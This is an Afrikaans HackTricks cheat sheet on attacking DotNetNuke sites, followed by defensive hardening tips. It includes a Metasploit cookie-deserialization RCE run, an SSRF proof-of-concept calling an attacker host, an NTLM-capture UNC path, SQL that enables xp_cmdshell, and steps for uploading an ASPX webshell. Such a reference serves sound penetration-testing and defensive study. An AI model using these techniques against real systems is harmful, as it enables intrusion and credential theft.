DotNetNuke (DNN)

Reading time: 5 minutes

tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

DotNetNuke (DNN)

As jy as administrateur in DNN inlog, is dit maklik om RCE te verkry, maar 'n aantal onaangetekende en post-auth tegnieke is in die afgelope paar jaar gepubliseer. Die volgende spiekbrief versamel die nuttigste primitiewe vir beide offensiewe en defensiewe werk.


Weergawe & Omgewing Enumerasie

  • Kontroleer die X-DNN HTTP antwoordkop – dit openbaar gewoonlik die presiese platformweergawe.
  • Die installasiewizard lek die weergawe in /Install/Install.aspx?mode=install (toeganklik op baie ou installasies).
  • /API/PersonaBar/GetStatus (9.x) gee 'n JSON blob wat "dnnVersion" bevat vir lae-privilege gebruikers.
  • Tipiese koekies wat jy op 'n lewende instansie sal sien:
  • .DOTNETNUKE – ASP.NET vorms verifikasieticket.
  • DNNPersonalization – bevat XML/serialiseerde gebruikersprofieldata (ou weergawe – sien RCE hieronder).

Onaangetekende Exploitatie

1. Koekie Deserialisering RCE (CVE-2017-9822 & opvolgings)

Geaffekteerde weergawes ≀ 9.3.0-RC

DNNPersonalization word op elke versoek gedeserialiseer wanneer die ingeboude 404 hanteraar geaktiveer is. Gemaakte XML kan dus lei tot arbitrΓͺre gadgetkettings en kode-uitvoering.

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

Die module kies outomaties die regte pad vir gepatchte maar steeds kwesbare weergawes (CVE-2018-15811/15812/18325/18326). Exploitatie werk sonder verifikasie op 7.x–9.1.x en met 'n geverifieerde lae-regte rekening op 9.2.x+.

2. Server-Side Request Forgery (CVE-2025-32372)

Geaffekteerde weergawes < 9.13.8 – Patch vrygestel April 2025

'n Bypass van die ouer DnnImageHandler regstelling stel 'n aanvaller in staat om die bediener te dwing om arbitraire GET versoeke uit te reik (semi-blind SSRF). Praktiese impakte:

  • Interne poortskandering / metadata diensontdekking in wolkontplooiings.
  • Bereik gasheer wat andersins deur die Internet geblokkeer is.

Bewys-van-konsep (vervang TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

Die versoek word in die agtergrond geaktiveer; monitor jou luisteraar vir terugroepe.

3. NTLM Hash Blootstelling via UNC Oorleiding (CVE-2025-52488)

Geaffekteerde weergawes 6.0.0 – 9.x (< 10.0.1)

Spesiaal saamgestelde inhoud kan DNN laat probeer om 'n hulpbron te verkry met 'n UNC pad soos \\attacker\share\img.png. Windows sal graag NTLM onderhandeling uitvoer, wat die bediener-rekening hashes aan die aanvaller blootstel. Opgradeer na 10.0.1 of deaktiveer uitgaande SMB by die firewall.

4. IP Filter Omseiling (CVE-2025-52487)

As administrateurs op Host/IP Filters staatmaak vir admin portaal beskerming, wees bewus dat weergawes voor 10.0.1 omseil kan word deur X-Forwarded-For in 'n omgekeerde proxy-scenario te manipuleer.


Post-Authentisering na RCE

Via SQL konsole

Onder Settings β†’ SQL 'n ingeboude vrae venster laat uitvoering teen die webwerf databasis toe. Op Microsoft SQL Server kan jy xp_cmdshell aktiveer en opdragte genereer:

sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

Via ASPX webshell oplaai

  1. Gaan na Settings β†’ Security β†’ More β†’ More Security Settings.
  2. Voeg aspx (of asp) by Allowable File Extensions en Save.
  3. Blaai na /admin/file-management en laai shell.aspx op.
  4. Trigger dit by /Portals/0/shell.aspx.

Privilege Escalation op Windows

Sodra kode-uitvoering bereik is as IIS AppPool<Site>, geld algemene Windows privilege-escalation tegnieke. As die boks kwesbaar is, kan jy benut:

  • PrintSpoofer / SpoolFool om SeImpersonatePrivilege te misbruik.
  • Juicy/Sharp Potatoes om Service Accounts te ontsnap.

Versterking Aanbevelings (Blou Span)

  • Opgradeer na ten minste 9.13.9 (regstel SSRF omseiling) of verkieslik 10.0.1 (IP-filter & NTLM probleme).
  • Verwyder oorblywende InstallWizard.aspx* lΓͺers na installasie.
  • Deaktiveer uitgaande SMB (poorte 445/139) egress.
  • Handhaaf sterk Host Filters op die rand proxy eerder as binne DNN.
  • Blokkeer toegang tot /API/RemoteContentProxy as dit nie gebruik word.

Verwysings

  • Metasploit dnn_cookie_deserialization_rce module dokumentasie – praktiese ongemagtigde RCE besonderhede (GitHub).
  • GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF omseiling & patch inligting.

tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks